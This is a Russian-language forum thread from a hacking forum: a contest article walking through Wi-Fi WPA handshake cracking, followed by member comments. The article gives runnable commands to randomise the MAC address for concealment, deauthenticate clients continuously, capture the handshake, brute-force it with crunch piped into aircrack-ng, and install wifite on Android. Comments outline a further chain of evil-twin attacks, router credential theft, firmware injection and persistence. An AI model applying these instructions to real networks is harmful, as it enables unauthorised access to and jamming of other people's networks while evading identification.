• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья для участия в конкурсе на codeby.

Приветствую всех дорогие форумчане. Я надеюсь вам понравится цикл моих статей по атакам на беспроводные сети.

Введение.
В этой и последующих частях мы будем проводить атаки на беспроводые сети( в моем случае я буду тестировать свою сеть). Также мы познакомимся с новыми фреймворками и различными утилитами для проведения данного рода атак.

В начале мы начнем с получения доступа к сети, то есть научимся осуществлять различные способы взлома точек доступа. Далее перейдем к атакам на самих пользователей сети, также попробуем получить полный контроль над сетью.
На этом описание закончено. Теперь перейдем к главному.

Взлом wifi.

Существует много способов получения доступа от тд(точка доступа):

  • Похищение handshake(рукопожатие)
  • Подбор wps ключа.
  • Фишинг(и даже он)
В этой части мы рассмотрим похищение рукопожатия. Нам понадобится пакет утилит aircrack и много свободного времени.
В конце этой части также будет описан этот способ взлома, но только с использованием смартфона на базе android.

Шаг 1.


Перед началом взлома нужно позаботиться о своей безопасности. Давайте сменим свой MAC - адрес.
Узнаем интерфейс своей сетевой карты.
Код:
iwconfig

Как видем у меня это wlan0.

Screenshot from 2017-10-30 12-12-41.png

Далее прописываем 3 простенькие команды.
Код:
ifconfig wlan0 down # отключаем интерфейс
macchanger -r wlan0 # меняем mac
ifconfig wlan0 up # запускаем интерфейс
wlan0 - это интерфейс моей сетевой карты.
r - параметр устанавливающий рандомный MAC.

Все отлично. Мы сменили MAC


Screenshot from 2017-10-30 12-13-21.png


О безопасности мы позаботились, теперь неплохо бы начать.

Шаг 2.

Чтобы начать взлом необходимо перевести нашу сетевую карту в режим мониторинга. Это режим в котором мы сможем видеть большинство точек доступа которые нас окружают, мы можем видеть всю необходимую информацию которая нам понадобится в дальнейшем.
Код:
airmon-ng start wlan0

airmon-ng - это самый маленький пакет который используется для включения режима мониторинга(в частности).

Screenshot from 2017-10-30 12-14-32.png


Как видим теперь название нашего сетевого интерфейса сменилось на - wlan0mon.

Теперь необходимо убить процессы которые могут помешать нам.
Код:
kill 1091
kill 1239

Подготовка подошла к концу. Теперь начнется самое интересное.

Шаг 3.

Нам нужно узнать какие точки находятся вблизи нас.
Воспользуемся airodump-ng.
Вобще airodump - это инструмент для захвата пакетов.
Код:
airodump-ng wlan0mon

Screenshot from 2017-10-30 12-15-49.png


Что же мы получаем очень много информации.
(Для остановки сканирования просто зажмите CTRL+C)

Для начало обратим внимание на канал на котором "висит" ваша цель. Сейчас мы поступим таким образом:
Будем глушить сигнал сети и одновременно с этим сканировать сеть ожидая рукопожатие. Мы получаем его при деаудентификации пользователя сети.

Во первых. Открываем новое окно в терминале и пишем
Код:
iwconfig wlan0mon channel 10
Тем самым мы "повесили" нашу сетевую карту на прослушку 11-ого канала.
Далее начнем глушить сигнал сети(атака wifi jammer)
Код:
aireplay-ng -0 0 -a <bssid> wlan0mon
Screenshot from 2017-10-30 12-16-41.png

BSSID - это своеобразный MAC точки доступа.
ESSID - это имя точки доступа.

a - параметр указывающий bssid
0 - параметр указывающий количество деаудентификаций пользователей.

Во вторых. Теперь попробуем получить рукопожатие(это долгий процесс).
Код:
airodump-ng --bssid <bssid> -w file wlan0mon
Теперь осталось подождать когда пользователь сети деавторизируется.

Screenshot from 2017-10-30 12-20-09.png


Ну вот мы и получили рукопожатие.

Теперь осталось "выбить из него все ценное".

Шаг 4.

Для получения пароля вместо использования баз паролей мы просто подключим crunch к aircrack по тунелю. Но нам нужно будет предполагать возможную длину пароля. Мы знаем что возможная минимальная длина это 8 символов. Допустим это и есть длина . Тогда вся наша конструкция будет выглядеть так
Код:
crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890.-_ | aircrack-ng -w - file.cap -b <bssid>
Это займет очень много времени. Также советую наблюдать за температурой процессора.
Screenshot from 2017-10-30 12-57-17.png

Надоже, все сработало успешно. Но все таки мы не можем точно знать из чего состоит пароль, его длинну, присутствуют ли различия регистра и.т.п.

Взлом с android.

Нам понадобится рутированый андроид. Если у вас нет root прав, то обязательно рутируйте.
Что же, теперь идем в play market и скачиваем Termux.
После установки Termux осталось опять же установить на него wifite.
Код:
1. apt update && apt upgrade
2. apt install git  && apt install python -y
3. git clone https://github.com/derv82/wifite
4. cd wifite
5. chmod +x wifite.py
6. ./wifite.py

Об использовании wifite я расскажу в следующей части.
На этом первая часть подошла к концу!
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Ну что ж выскажусь и я по поводу статьи. Хочу что бы моя критика лишь указала автору над чем нужно работать , не в коем случае не нужно обижаться!!!

Давайте будем реалистами:
Метериал про Брут впа хендшейка уже все жували пережували ... Я в силу своего времени попытаюсь написать статью вне конкурса о том какую я примерно жду статью от участников конкурса)) .

Я могу предположить что следующие посты от тс будут на тему уязвимости wps , использования bullet и reaver-ng так же возмлжно будет вспомнено про wps pixie dust , описан вектор евил твин с помощью различных инструментов типа wifi phisher , mana toolkit и wifi pumpkin... Но это уже все описано у нас на форуме даже , даже если не говорить про сторонние источники , если взять журнал хакер или хабр , то технология взлома впа была описана ещё в 2012 году.

Поэтому взлом вай фай сетей хотелось бы видеть в более новых векторах или с логической цепочкой хотя бы, например :
Ловим хендшейк, брутим хешкетом, в это время пока брутиться играемся с впс если он есть , если его нету - поднимаем Эвил твин. Попадаем в вай фай сеть, делаем сниф и спуф с целью получить креды от роутера . Получаем креды если они не дефолт , далее пентестим роутер , инжектим прошивку , закрепляется. Далее сегмент сети исследуем , выявляем хосты , пробиваем их различными способами.
Таким образом получаем тотальный контроль над роутером и сегментом сети через взлом вай фая...

Какого то эт такого хочеться видеть)
 

yarr

Red Team
05.10.2017
311
620
BIT
0
Статья хорошая но вот вопрос.
Разве Wifite работает на Android ? для него же нужен Aircrack-ng, нужно каким то чудом его установить, а если и установить то нужно еще и подключить WI-FI адаптер через OTG кабель, так как стандартный Android вифи адаптер не поддерживает Monitor-mod(в принципе можно и BCMON но он же не для всех андроид).
Может быть я тебя удивлю, но ломать WiFi с Android давно можно даже без внешнего свистка... Теги: bcmon(давно используется, в т.ч для pixiedust), NexMon, Hijacker, NetHunter, chroot, external WiFi-adapter on NetHunter. Да, не на всех устройствах это возможно, но недавно список расширился + популярные вардрайверские игрушки NetHunter поддерживает, можно мутить KARMA, MANA, WPS, Ананас, х@епомпас etc. Какие-то извращенцы туда еще пихают RouterScan, есть возможность работы с SDR, почти всеми векторами BadUSB, в общем all-of-one. По смартфону проще всего реализовать на Nexus 5. Там все делается (установка) в 2-3 клика.
 
Последнее редактирование:
I

Inject0r

Статья действительно написана хорошо, читается просто и легко. Правда для себя ничего нового не нашел. Я бы еще добавил, что предварительно хендшейк стоит проверить в шарке на корректность, чтобы присутствовали все этапы рукопожатия, иначе брут может не дать результатов. И брутить аиркраком - очень долго, лучше воспользоваться хэшкэтом с поддержкой видеокарт.
 

el_gis

One Level
19.02.2017
3
1
BIT
0
Отличный материал!
Можно добавить про онлайн сервисы подбора ключа по дампу:


/
 
  • Нравится
Реакции: Tihon49

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Отличный материал!
Можно добавить про онлайн сервисы подбора ключа по дампу:


/
Реклама ресурсов без согласования с администрацией - запрещена.
 
V

vasska

Поставил Termux, все прошло хорошо, но после команды ./wifite.py пишет нет такой директории. Прописывал по разному и через /home/wifite.py не запускается wifite
Конечно я тороплю события, все обещано в следующей статье, но было бы неплохо сразу пояснить с директориями, чтобы запускалась программа с смартфона.
 
  • Нравится
Реакции: Coinwarz

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
19
Да ладно?! Серьезно?! Триллиард первая по счету статья как хватать хэндшейки и брутить их?! Люди уже крак разреверсили а вы баяНы простите.
 
  • Нравится
Реакции: DefWolf и remez

grayuser

Green Team
14.11.2017
45
4
BIT
0
А почему бы не отдать 100 рубликов и отправить в специальзированые службы-сайтики? Быстро и не дорого вроде бы
 

vag4b0nd

Green Team
24.05.2017
303
1 472
BIT
30
А почему бы не отдать 100 рубликов и отправить в специальзированые службы-сайтики? Быстро и не дорого вроде бы
Так вот эта статья для того чтоб ты понимал на что идешь и каковы шансы или же чтоб ты мог сам и бесплатно. Подумай пожалуйста над тем что написал ; D
 
  • Нравится
Реакции: grayuser

Elektrolife

Green Team
21.10.2016
208
33
BIT
7
Способ старый как гугл. Ты лучше расскажи про "пиксельную пыль" либо злого двойника, хотя и об этом думаю знают все.

нее,это всё тоже устаревает уже,хотя и работает. Тут не так давно появлялась информация о взломе,основанном на подмене данных на этапе обмена ключами. В описании говорилось,что можно получить любую сеть затратив минимум времени. Вот только PoC так никто и не выложил... Печалька
 
I

Ibragimqqqppp

Помоги пж у меня пишет что iwconfig такой команды нет
 
Последнее редактирование модератором:

Глюк

Red Team
03.01.2018
1 184
1 877
BIT
109
Помоги пж у меня пишет что iwconfig такой команды нет
ifconfig и команда iwconfig теперь считаются устаревшими, и в новых дистрибутивах их нету. т.е. нету утилиты wireless_tools. ей на замену пришла утилита iw. хотите поставьте любую из них, хотите обе...
 
Последнее редактирование модератором:
  • Нравится
Реакции: valerian38 и TROOPY

Genius1oci

Green Team
09.05.2018
45
39
BIT
0
iwconfig wlan0mon channel 10
Тем самым мы "повесили" нашу сетевую карту на прослушку 11-ого канала.
Исправь опечатку.
Хорошая статья для начинающих. Очень подробно расписано.
 

Tihon49

Green Team
06.01.2018
193
120
BIT
0
Тема заезженная, факт. НО! Манера написания - топ!!!
 
  • Нравится
Реакции: Merfi

HAPILL

New member
26.04.2020
1
0
BIT
0
Вылазит вот это в termux
File "./wifite.py", line 261
print R + ' [!]' + O + ' ERROR:' + G + ' wifite' + O + ' must be run as ' + R + 'root' + W
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(R + ' [!]' + O + ' ERROR:' + G + ' wifite' + O + ' must be run as ' + R + 'root' + W)?
 

but43r

Red Team
23.12.2019
19
2
BIT
0
Вылазит вот это в termux
File "./wifite.py", line 261
print R + ' [!]' + O + ' ERROR:' + G + ' wifite' + O + ' must be run as ' + R + 'root' + W
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(R + ' [!]' + O + ' ERROR:' + G + ' wifite' + O + ' must be run as ' + R + 'root' + W)?
Wifite.py написан на Python2.7, а вы скорее всего запускаете его через Python3 вот и ошибка.

Запустите так: python2.7 wifite.py
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!